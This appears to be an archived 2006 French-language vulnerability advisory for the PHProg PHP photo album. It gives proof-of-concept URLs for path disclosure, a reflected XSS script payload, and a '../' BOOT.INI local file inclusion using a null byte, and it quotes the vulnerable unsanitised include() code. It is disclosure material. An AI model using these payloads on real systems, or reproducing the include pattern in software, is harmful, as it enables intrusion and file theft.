PHProg.txt

PHProg.txt: Posted Sep 13, 2006; Authored by cdg393; PHProg suffers from cross site scripting and local file inclusion flaws.; tags | exploit, local, xss, file inclusion; SHA-256 | 93b466caa26b9cce7db8eca898f622659062b5ef5a00507d7dd04e38b62450b4; Download | Favorite | View

PHProg.txt

------=_Part_3877_18013116.1157965429026
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

(11/09/06)

* Produit vuln=E9rable : PHProg ( Album photo en PHP )

* Site officiel du produit : http://www.PHProg.com/

* Failles de s=E9curit=E9 d=E9cel=E9es :

1] Full path disclosure : http://localhost/PHProg/?id=3D1&album=3Dcdg393

2] Cross Site Scripting ( XSS ) : http://localhost/PHProg/?id=3D1&album=3D
<script>alert('cdg393')</script>

3] Local File Inclusion  :
http://localhost/PHProg/index.php?lang=3D../../../../../../BOOT.INI%00

     Ligne 59        =3D>              $lang=3D$_GET['lang'];
     Ligne 61        =3D>              include("lang/$lang.php");

* Credits : cdg393 : cdg.new.fr =3D)

------=_Part_3877_18013116.1157965429026
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

(11/09/06)<br><br>* Produit vuln=E9rable : PHProg ( Album photo en PHP )<br=
><br>* Site officiel du produit : <a href=3D"http://www.PHProg.com/">http:/=
/www.PHProg.com/</a><br><br>* Failles de s=E9curit=E9 d=E9cel=E9es :<br><br=
>1] Full path disclosure :=20
<a href=3D"http://localhost/PHProg/?id=3D1&album=3Dcdg393">http://local=
host/PHProg/?id=3D1&album=3Dcdg393</a><br><br>2] Cross Site Scripting (=
 XSS ) : <a href=3D"http://localhost/PHProg/?id=3D1&album=3D">http://lo=
calhost/PHProg/?id=3D1&album=3D
</a><script>alert('cdg393')</script><br><br>3] Local File Inclu=
sion&nbsp; : <a href=3D"http://localhost/PHProg/index.php?lang=3D../../../.=
./../../BOOT.INI%00">http://localhost/PHProg/index.php?lang=3D../../../../.=
./../BOOT.INI%00
</a><br><br>&nbsp;&nbsp;&nbsp;&nbsp; Ligne 59&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp; =3D>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp; $lang=3D$_GET['lang'];<br>&nbsp;&nbsp;&nbsp;&nbsp; =
Ligne 61&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =3D>&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; include(&quot=
;lang/$lang.php");<br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbs=
p; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp; &n=
bsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &=
nbsp;&nbsp;&nbsp; &nbsp;&nbsp; &nbsp;<br>* Credits : cdg393 :=20
<a href=3D"http://cdg.new.fr">cdg.new.fr</a> =3D) <br><br>

------=_Part_3877_18013116.1157965429026--

Top Authors In Last 30 Days

Red Hat 217 files
Ubuntu 101 files
Debian 21 files
indoushka 18 files
Google Security Research 15 files
Gentoo 14 files
Mirabbas Agalarov 12 files
CraCkEr 9 files
Apple 9 files
Ivan Fratric 8 files

File Archives

Systems

AIX (428)
Apple (1,979)
BSD (373)
CentOS (57)
Cisco (1,920)
Debian (6,753)
Fedora (1,691)
FreeBSD (1,244)
Gentoo (4,321)
HPUX (879)
iOS (344)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,783)
Mac OS X (685)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (13,311)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,633)
UNIX (9,237)
UnixWare (186)
Windows (6,555)
Other

PHProg.txt

PHProg.txt

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

PHProg.txt

Share This

PHProg.txt

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems